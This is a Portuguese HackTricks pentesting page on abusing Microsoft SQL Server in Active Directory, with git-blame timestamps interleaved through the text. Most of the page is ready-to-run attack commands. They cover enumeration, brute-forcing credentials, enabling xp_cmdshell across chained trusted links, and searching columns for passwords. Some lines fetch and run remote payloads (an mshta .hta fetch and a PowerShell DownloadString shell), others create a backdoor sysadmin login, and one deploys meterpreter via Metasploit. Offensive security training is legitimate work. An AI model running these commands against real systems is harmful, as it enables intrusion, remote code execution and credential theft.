2024-07-18 22:06:26 +00:00
# MSSQL AD Abuse
{% hint style="success" %}
Aprenda e pratique Hacking AWS:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-18 22:06:26 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 22:06:26 +00:00
* Confira os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
* **Junte-se ao** 💬 [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga** -nos no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-09-15 15:23:35 +00:00
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:06:26 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-05-02 15:04:03 +00:00
< figure > < img src = "https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-07 22:57:51 +00:00
{% embed url="https://websec.nl/" %}
2024-09-15 15:23:35 +00:00
## **MSSQL Enumeração / Descoberta**
### Python
A ferramenta [MSSQLPwner ](https://github.com/ScorpionesLabs/MSSqlPwner ) é baseada em impacket e também permite autenticar usando tickets kerberos e atacar através de cadeias de links.
< figure > < img src = "https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png" > < / figure >
```shell
# Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
# Interactive mode with 2 depth level of impersonations
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
# Executing direct query
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
# Retrieving password from the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
# Execute code using custom assembly on the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
```
### Enumerando a partir da rede sem sessão de domínio
```
# Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
```
---
### Powershell
2024-04-07 22:57:51 +00:00
2024-05-05 22:04:08 +00:00
O módulo powershell [PowerUpSQL ](https://github.com/NetSPI/PowerUpSQL ) é muito útil neste caso.
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Import-Module .\PowerupSQL.psd1
2022-08-15 13:00:19 +00:00
```
2023-06-06 18:56:34 +00:00
### Enumerando a partir da rede sem sessão de domínio
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
2020-07-15 15:43:14 +00:00
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP – Verbose – Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
2022-08-15 13:00:19 +00:00
```
2023-06-06 18:56:34 +00:00
### Enumerando de dentro do domínio
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
2020-07-15 15:43:14 +00:00
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
2024-02-07 04:39:38 +00:00
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
2020-07-15 15:43:14 +00:00
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
2022-08-15 13:00:19 +00:00
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
2024-09-15 15:23:35 +00:00
## Abuso Básico do MSSQL
2022-08-15 13:00:19 +00:00
2024-07-18 22:06:26 +00:00
### Acessar DB
2022-08-15 13:00:19 +00:00
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
2020-07-15 15:43:14 +00:00
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
2022-08-18 23:47:45 +00:00
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
2022-08-15 13:00:19 +00:00
```
2024-02-08 04:35:32 +00:00
### MSSQL RCE
2022-08-15 13:00:19 +00:00
2024-07-18 22:06:26 +00:00
Pode também ser possível **executar comandos** dentro do host MSSQL
2022-08-15 13:00:19 +00:00
```powershell
2022-10-08 08:36:40 +00:00
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
2022-08-15 13:00:19 +00:00
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
2024-07-18 22:06:26 +00:00
Verifique na página mencionada na **seção seguinte como fazer isso manualmente.**
2022-08-15 13:00:19 +00:00
2024-07-18 22:06:26 +00:00
### Truques Básicos de Hacking MSSQL
2022-08-15 13:00:19 +00:00
2024-05-02 15:04:03 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server ](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ )
{% endcontent-ref %}
2024-07-18 22:06:26 +00:00
## Links Confiáveis MSSQL
2022-08-15 13:00:19 +00:00
2024-09-15 15:23:35 +00:00
Se uma instância MSSQL é confiável (link de banco de dados) por uma instância MSSQL diferente. Se o usuário tiver privilégios sobre o banco de dados confiável, ele poderá **usar o relacionamento de confiança para executar consultas também na outra instância** . Essas confianças podem ser encadeadas e, em algum momento, o usuário pode ser capaz de encontrar algum banco de dados mal configurado onde pode executar comandos.
2022-08-15 13:00:19 +00:00
2024-07-18 22:06:26 +00:00
**Os links entre bancos de dados funcionam mesmo através de confianças de floresta.**
2022-08-15 13:00:19 +00:00
2023-06-06 18:56:34 +00:00
### Abuso do Powershell
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
2022-12-20 14:18:39 +00:00
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
2020-07-15 15:43:14 +00:00
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
2021-01-03 00:43:09 +00:00
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "< INSTANCE1 > " -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "< INSTANCE2 > "'
2020-07-15 15:43:14 +00:00
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv – Verbose – Instance "SQLServer1\Instance1"
2022-08-18 23:47:45 +00:00
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
2022-09-04 09:37:14 +00:00
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
2020-07-15 15:43:14 +00:00
```
2022-07-28 09:46:19 +00:00
### Metasploit
2020-07-15 15:43:14 +00:00
2024-09-15 15:23:35 +00:00
Você pode facilmente verificar links confiáveis usando metasploit.
2020-07-15 15:43:14 +00:00
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
2024-07-18 22:06:26 +00:00
Note que o metasploit tentará abusar apenas da função `openquery()` no MSSQL (então, se você não conseguir executar comandos com `openquery()` , precisará tentar o método `EXECUTE` **manualmente** para executar comandos, veja mais abaixo.)
2022-07-28 09:46:19 +00:00
### Manual - Openquery()
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
A partir do **Linux** , você pode obter um shell de console MSSQL com **sqsh** e **mssqlclient.py.**
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
A partir do **Windows** , você também pode encontrar os links e executar comandos manualmente usando um **cliente MSSQL como** [**HeidiSQL** ](https://www.heidisql.com )
2020-07-15 15:43:14 +00:00
2024-09-15 15:23:35 +00:00
_Login usando autenticação do Windows:_
2020-07-15 15:43:14 +00:00
2024-05-05 22:04:08 +00:00
![](< .. / . . / . gitbook / assets / image ( 808 ) . png > )
2024-05-02 15:04:03 +00:00
#### Encontrar Links Confiáveis
2022-08-15 13:00:19 +00:00
```sql
2024-03-26 19:22:56 +00:00
select * from master..sysservers;
EXEC sp_linkedservers;
2022-08-15 13:00:19 +00:00
```
2024-05-05 22:04:08 +00:00
![](< .. / . . / . gitbook / assets / image ( 716 ) . png > )
2024-02-07 04:39:38 +00:00
2024-07-18 22:06:26 +00:00
#### Execute queries in trustable link
2020-07-15 15:43:14 +00:00
2024-09-15 15:23:35 +00:00
Execute consultas através do link (exemplo: encontre mais links na nova instância acessível):
2022-08-15 13:00:19 +00:00
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
2024-07-18 22:06:26 +00:00
Verifique onde aspas duplas e simples são usadas, é importante usá-las dessa forma.
2022-08-15 13:00:19 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-05-05 22:04:08 +00:00
![](< .. / . . / . gitbook / assets / image ( 643 ) . png > )
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Você pode continuar essa cadeia de links confiáveis para sempre manualmente.
2022-08-15 13:00:19 +00:00
```sql
# First level RCE
SELECT * FROM OPENQUERY("< computer > ", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("< computer2 > ", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
2024-07-18 22:06:26 +00:00
Se você não consegue realizar ações como `exec xp_cmdshell` a partir de `openquery()` , tente com o método `EXECUTE` .
2024-05-02 15:04:03 +00:00
2022-07-28 09:46:19 +00:00
### Manual - EXECUTE
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
Você também pode abusar de links confiáveis usando `EXECUTE` :
2020-07-15 15:43:14 +00:00
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
2023-06-06 18:56:34 +00:00
## Escalação de Privilégios Local
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
O **usuário local do MSSQL** geralmente possui um tipo especial de privilégio chamado ** `SeImpersonatePrivilege` **. Isso permite que a conta "imite um cliente após a autenticação".
2024-04-07 22:57:51 +00:00
2024-07-18 22:06:26 +00:00
Uma estratégia que muitos autores desenvolveram é forçar um serviço do SYSTEM a se autenticar em um serviço malicioso ou man-in-the-middle que o atacante cria. Esse serviço malicioso pode então imitar o serviço do SYSTEM enquanto tenta se autenticar.
2022-08-15 13:00:19 +00:00
2024-05-05 22:04:08 +00:00
[SweetPotato ](https://github.com/CCob/SweetPotato ) possui uma coleção dessas várias técnicas que podem ser executadas através do comando `execute-assembly` do Beacon.
2022-08-15 13:00:19 +00:00
2024-05-02 15:04:03 +00:00
< figure > < img src = "https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-07 22:57:51 +00:00
{% embed url="https://websec.nl/" %}
2024-07-18 22:06:26 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-07 22:57:51 +00:00
< details >
2024-09-15 15:23:35 +00:00
< summary > Support HackTricks< / summary >
2024-04-07 22:57:51 +00:00
2024-07-18 22:06:26 +00:00
* Confira os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
* **Junte-se ao** 💬 [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga** -nos no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2024-04-07 22:57:51 +00:00
< / details >
2024-07-18 22:06:26 +00:00
{% endhint %}